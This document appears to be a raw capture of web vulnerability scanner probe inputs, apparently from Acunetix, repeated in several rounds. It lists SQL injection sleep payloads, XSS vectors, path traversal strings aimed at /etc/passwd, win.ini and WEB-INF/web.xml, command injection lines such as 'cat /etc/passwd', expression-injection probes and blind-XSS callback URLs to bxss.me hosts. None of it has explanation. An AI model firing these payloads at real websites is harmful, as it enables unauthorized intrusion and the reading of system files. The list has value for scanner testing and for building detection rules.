if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(945537)>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1

`cat /etc/passwd`

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986677)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1)

${99664+99650}

1

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(999955)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&n957824=v944280

1<img/src=">" onerror=alert(933977)>

)

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

q8ZvBZBK'

1some_inexistent_file_with_long_name%00.jpg

SqEENP28')

1

!(()&&!|*|*|

1

1<ScRiPt%20>prompt(920514)</sCripT>

"|"ld

1

.\./.\./.\./.\./.\./.\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

MlwwU7hi'))

^(#$!@#$)(()))******

1&lt

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

'

-1

1

'

1

1

<img acu onmouseover=prompt(985449) //>

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

1

"

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(988334)>

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitTE8zWZrqTI.bxss.me/

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

<a href='http://www.acunetix.com'>website security</a>

JR66t46g'

1

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

comments

&dir

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

Zq6PBBmk')

'&dir&'

comments

1_MWYko <ScRiPt >prompt(924416)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

'"

1

file:///etc/passwd

eLH8VJSO'))

comments/.

1

"&dir&"

1

<!--

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(904518)</ScRiPt>

|dir

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(944925)</ScRiPt>

WEB-INF/web.xml

1

1

1

'|dir

1

1

1_951985

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu9856<s1﹥s2ʺs3ʹuca9856

1

1

1

windowswin.ini

1

acux1412z1z2abcxuca1412

1

1

................windowswin.ini

1

1<ScRiPt >prompt(906349)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(941234)</script>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(981292)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953649></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(931737)</ScRiPt>

response.write(9853457*9163584)

1

1

1

1<video><source onerror="javascript:prompt(969639)">

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9853457*9163584)+'

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905875)"></g></svg>

1

'&cat /etc/passwd&'

"+response.write(9853457*9163584)+"

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1<div style=width:expression(prompt(973656))>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

cat /etc/passwd

1

1<body onload=prompt(935403)>

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

-1

`cat /etc/passwd`

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981792)>

${99715+99273}

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(930290)>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

1&n951992=v999118

1<img/src=">" onerror=alert(937412)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

S8R89I9h'

'"()

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(985166)</sCripT>

1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

5qDf7gF3')

1

^(#$!@#$)(()))******

.\./.\./.\./.\./.\./.\./etc/passwd

1&lt

testasp.vulnweb.com

1

1

IwYCIM96'))

1

1

'

<img acu onmouseover=prompt(935239) //>

/etc/passwd

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(912625)>

"

"

1

1

1

-1)

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

http://hit5G34e4yr1d.bxss.me/

1

-1))

comments

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

&dir

py3ZOXXK'

1

1

comments

1

1_TOQBQ <ScRiPt >prompt(993822)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'&dir&'

v1Isryw0')

1

1

http://www.acunetix.tst

comments/.

1

1

file:///etc/passwd

"&dir&"

bT8F2BY5'))

'"

1

1

1

1

1

1

<!--

1'"()&%<ScRiPt >prompt(929647)</ScRiPt>

|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(988592)</ScRiPt>

'|dir

1

1

1

WEB-INF/web.xml

"|dir

1_917061

1

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu5894<s1﹥s2ʺs3ʹuca5894

../../../../../../../../../../boot.ini

1

1

1

acux7803z1z2abcxuca7803

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(995748)</ScRiPt>

windowswin.ini

1

1

1

1<script>prompt(995575)</script>

1

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(910383)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978362></ScRiPt>

response.write(9164412*9889988)

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(959364)</ScRiPt>

1

&cat /etc/passwd&

'+response.write(9164412*9889988)+'

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(906807)">

1

"+response.write(9164412*9889988)+"

1

1

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972073)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

1

1<div style=width:expression(prompt(900689))>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

cat /etc/passwd

1

1

1<iframe src='data:text/html

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

`cat /etc/passwd`

1<body onload=prompt(950426)>

1

1

${99342+100351}

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934141)>

1

1

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n970276=v973651

'|'ld

1

1<img src=xyz OnErRor=prompt(900827)>

)

1

-1))

"|"ld

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1

1<img/src=">" onerror=alert(968466)>

'"()

u5JCu5f6'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

1<ScRiPt%20>prompt(932603)</sCripT>

^(#$!@#$)(()))******

1

1

HhUCfOnj')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

testasp.vulnweb.com

'

1&lt

/etc/passwd

1

1

1

wkD8SjZh'))

1

1

"

<img acu onmouseover=prompt(911312) //>

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

http://hitL7Qr1Vxjv2.bxss.me/

1

1<input autofocus onfocus=prompt(976784)>

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

comments

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

1

'&dir&'

xaSAiDSq'

comments

http://www.acunetix.tst

1

1

................etc/passwd

1

1_wKEHO <ScRiPt >prompt(978272)</ScRiPt>

comments/.

'"

"&dir&"

LN60NHyS')

1

1

1

1'"()&%<ScRiPt >prompt(962041)</ScRiPt>

1

<!--

1

3NXo2e8m'))

1

1

|dir

'"()&%<ScRiPt >prompt(999482)</ScRiPt>

1

1

1

1

1

'|dir

1

1_901434

1

1

"|dir

1

1

1

1

file:///etc/passwd

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

acu8694<s1﹥s2ʺs3ʹuca8694

1

WEB-INF/web.xml

acux1660z1z2abcxuca1660

1

1

1

WEB-INF\web.xml

1<ScRiPt >prompt(908331)</ScRiPt>

1

1

1

1

1<script>prompt(955582)</script>

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(987298)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936937></ScRiPt>

1

1

1

1<ScRiPt >prompt(984744)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1<video><source onerror="javascript:prompt(959094)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(990755)"></g></svg>

windowswin.ini

1

1

response.write(9419968*9569567)

1<div style=width:expression(prompt(933064))>

1

................windowswin.ini

1

&cat /etc/passwd&

'+response.write(9419968*9569567)+'

1<iframe src='data:text/html

1

1

..\..\..\..\..\..\..\..\windows\win.ini

'&cat /etc/passwd&'

1

"+response.write(9419968*9569567)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(908206)>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973008)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(919246)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(994806)>

1

-1

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1)

1<ScRiPt%20>prompt(911909)</sCripT>

|cat /etc/passwd#

1

${99512+99799}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

WEB-INF/web.xml

1

1&lt

-1))

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&n907379=v977481

)

w4wXw0HX'

<img acu onmouseover=prompt(951517) //>

WEB-INF\web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

!(()&&!|*|*|

mHV1oj5m')

.\./.\./.\./.\./.\./.\./etc/passwd

1<input autofocus onfocus=prompt(918541)>

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'

cFa6XH58'))

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

1

1

testasp.vulnweb.com

1

'

"

-1

[url=http://www.acunetix.com]website security[/url]

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1_urbyL <ScRiPt >prompt(948966)</ScRiPt>

1

http://hitDanKwyTNEa.bxss.me/

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

comments

1

................etc/passwd

1

1

3Gk1STPo'

1

1

comments

&dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

kDStAFJL')

http://www.acunetix.tst

1

'&dir&'

comments/.

1

1

'"

file:///etc/passwd

exuEp6vG'))

1

1'"()&%<ScRiPt >prompt(976369)</ScRiPt>

1

1

"&dir&"

1

<!--

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(992979)</ScRiPt>

1

|dir

1

1

WEB-INF/web.xml

1

1_987400

WEB-INF\web.xml

1

1

1

'|dir

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

acu6764<s1﹥s2ʺs3ʹuca6764

1

1

acux4608z1z2abcxuca4608

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(941315)</ScRiPt>

1

1

1

windowswin.ini

1<script>prompt(962865)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(964060)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977806></ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt >prompt(901287)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(940581)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(912512)"></g></svg>

1

1<div style=width:expression(prompt(944733))>

1

response.write(9689747*9402526)

1

WEB-INF/web.xml

1

1<iframe src='data:text/html

1

'+response.write(9689747*9402526)+'

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

WEB-INF\web.xml

1

1<body onload=prompt(999137)>

1

"+response.write(9689747*9402526)+"

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968565)>

1

if(now()=sysdate(),sleep(9.75),0)/*'XOR(if(now()=sysdate(),sleep(9.75),0))OR'"XOR(if(now()=sysdate(),sleep(9.75),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1<img src=xyz OnErRor=prompt(913167)>

1

1

(select(0)from(select(sleep(9.75)))v)/*'+(select(0)from(select(sleep(9.75)))v)+'"+(select(0)from(select(sleep(9.75)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1<img/src=">" onerror=alert(967178)>

cat /etc/passwd

1

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(931456)</sCripT>

1

1

1

${99532+99128}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1

|cat /etc/passwd#

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

-1))

1

1&n928341=v938846

/../..//../..//../..//../..//../..//etc/passwd.jpg

<img acu onmouseover=prompt(997980) //>

'|'ld

1some_inexistent_file_with_long_name%00.jpg

)

1

1

oAcmU46c'

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1<input autofocus onfocus=prompt(935376)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

1

testasp.vulnweb.com

DY5qYQLQ')

1

1

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

^(#$!@#$)(()))******

1

MX98bYm4'))

'"()

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1_8GEqb <ScRiPt >prompt(932438)</ScRiPt>

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

1

1

1

1

-1))

acunetix_wvs_invalid_filename

"

http://hitHiWSD9ZiO7.bxss.me/

................etc/passwd

1

||cat /etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

j7Nz2flR'

comments

1

${@print(md5(acunetix_wvs_security_test))}

1

&dir

1

1

1

QYXIO89t')

http://www.acunetix.tst

comments

'"

${@print(md5(acunetix_wvs_security_test))}\

1'"()&%<ScRiPt >prompt(995509)</ScRiPt>

'&dir&'

file:///etc/passwd

Cnw7tnF3'))

1

1

comments/.

<!--

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(953995)</ScRiPt>

"&dir&"

1

1

1_953539

1

1

1

WEB-INF/web.xml

|dir

1

1

1

1

WEB-INF\web.xml

1

1

'|dir

1

1

../../../../../../../../../../windows/win.ini

1

acu6643<s1﹥s2ʺs3ʹuca6643

"|dir

1

1

1

acux8108z1z2abcxuca8108

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(963325)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(975526)</script>

1

1

1

1<ScRiPt >prompt(928513)</ScRiPt>

windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901492></ScRiPt>

1

................windowswin.ini

1<ScRiPt >prompt(994635)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(937543)">

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905676)"></g></svg>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<div style=width:expression(prompt(957363))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9937147*9150116)

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9937147*9150116)+'

1

1<body onload=prompt(900729)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9937147*9150116)+"

1

&cat /etc/passwd&

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964991)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(953442)>

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

1

1

1<img/src=">" onerror=alert(974429)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF\web.xml

1

cat /etc/passwd

1

1

1<ScRiPt%20>prompt(991615)</sCripT>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

${99615+100254}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

-1

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n912263=v999605

1some_inexistent_file_with_long_name%00.jpg

1

)

-1)

<img acu onmouseover=prompt(916567) //>

'|'ld

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1<input autofocus onfocus=prompt(948710)>

'"()

testasp.vulnweb.com

"|"ld

1

^(#$!@#$)(()))******

'

1

q0qYa6Fu'

1

<a href='http://www.acunetix.com'>website security</a>

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

"

tYxi83lh')

1

1

1

1

/etc/passwd

'

1

${@print(md5(acunetix_wvs_security_test))}

1_uLPDu <ScRiPt >prompt(992950)</ScRiPt>

rD1BMC5x'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

-1

1

http://hitHPGuQhu4fh.bxss.me/

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

1

acunetix_wvs_invalid_filename

1

................etc/passwd

1

1

1

1

&dir

-1))

comments

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(938555)</ScRiPt>

'"

sLDryMa8'

1

'&dir&'

1

comments

<!--

'"()&%<ScRiPt >prompt(938833)</ScRiPt>

WjKbERux')

1

file:///etc/passwd

1

1_991139

"&dir&"

1

comments/.

1

XqAhYOvM'))

1

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1

WEB-INF/web.xml

'|dir

1

1

WEB-INF\web.xml

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

acu8853<s1﹥s2ʺs3ʹuca8853

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux4758z1z2abcxuca4758

windowswin.ini

1

1<ScRiPt >prompt(945468)</ScRiPt>

1

1

................windowswin.ini

1

1

1<script>prompt(920286)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(944468)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?982178></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(973315)</ScRiPt>

1

response.write(9144891*9145781)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(954276)">

1

1

&cat /etc/passwd&

'+response.write(9144891*9145781)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(963756)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9144891*9145781)+"

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1<div style=width:expression(prompt(962939))>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

1<iframe src='data:text/html

1

1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<body onload=prompt(990565)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1

-1

1

-1)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(919157)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100320+99043}

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1

1<img src=xyz OnErRor=prompt(955706)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img/src=">" onerror=alert(973548)>

rdpq9Ygd'

1

1&n991421=v917398

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

1

)

testasp.vulnweb.com

1

iYdkIXWo')

1<ScRiPt%20>prompt(904486)</sCripT>

1

/etc/passwd

1

!(()&&!|*|*|

1

1

7Dhz9IhN'))

1

1&lt

'

1

^(#$!@#$)(()))******

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

<img acu onmouseover=prompt(990977) //>

1

'"()

"

1

1

1<input autofocus onfocus=prompt(949446)>

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

-1))

1

1

"

................etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

1

7UcNwoyv'

http://hitElx9HD3jqE.bxss.me/

&dir

1

${@print(md5(acunetix_wvs_security_test))}

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_GOZIT <ScRiPt >prompt(972568)</ScRiPt>

acunetix_wvs_invalid_filename

UH13Dw5q')

1

1

1

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

1

file:///etc/passwd

1

1

PkbrS0KR'))

comments

1

http://www.acunetix.tst

'"

comments

1

1

1'"()&%<ScRiPt >prompt(936783)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1

1

comments/.

<!--

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(978562)</ScRiPt>

1

1

1

1

1

1

WEB-INF\web.xml

1_920360

|dir

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu9139<s1﹥s2ʺs3ʹuca9139

1

windowswin.ini

1

acux9760z1z2abcxuca9760

1

1

1<ScRiPt >prompt(935297)</ScRiPt>

1

................windowswin.ini

